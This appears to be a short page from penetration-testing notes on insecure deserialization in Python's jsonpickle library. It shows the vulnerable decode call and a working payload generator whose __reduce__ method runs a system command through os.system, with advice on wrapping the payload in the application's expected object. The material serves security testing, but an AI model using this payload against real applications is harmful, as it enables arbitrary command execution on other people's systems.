Python JSONPickle

Function responsible for Insecure Deserialization

Debugger is very useful when it comes to delivering the payload in a proper way

If there is not checking nor sanitization before decoding provided pickle the application is vulnerable.

jsonpickle.decode(USER_INPUT) # vulnerable code

Malicious object

In order to create malicious object which will be able to execute system commands you can use the script below:

import os
import jsonpickle

class Shell(object):
    def __reduce__(self):
        return (os.system, ("touch /tmp/deser",))
        
print(jsonpickle.dumps(Shell()))

Output should look like that:

Depending on the application flow you should accordingly encode the payload or/and wrap it inside expected object in application.

Sample object wrapping:

{
    "app_desired_object":{
        [PAYLOAD GOES HERE]
    }
}

PreviousViewState Encryption / Description Tool NextCreating your own exploit / gadget

Last updated 3 months ago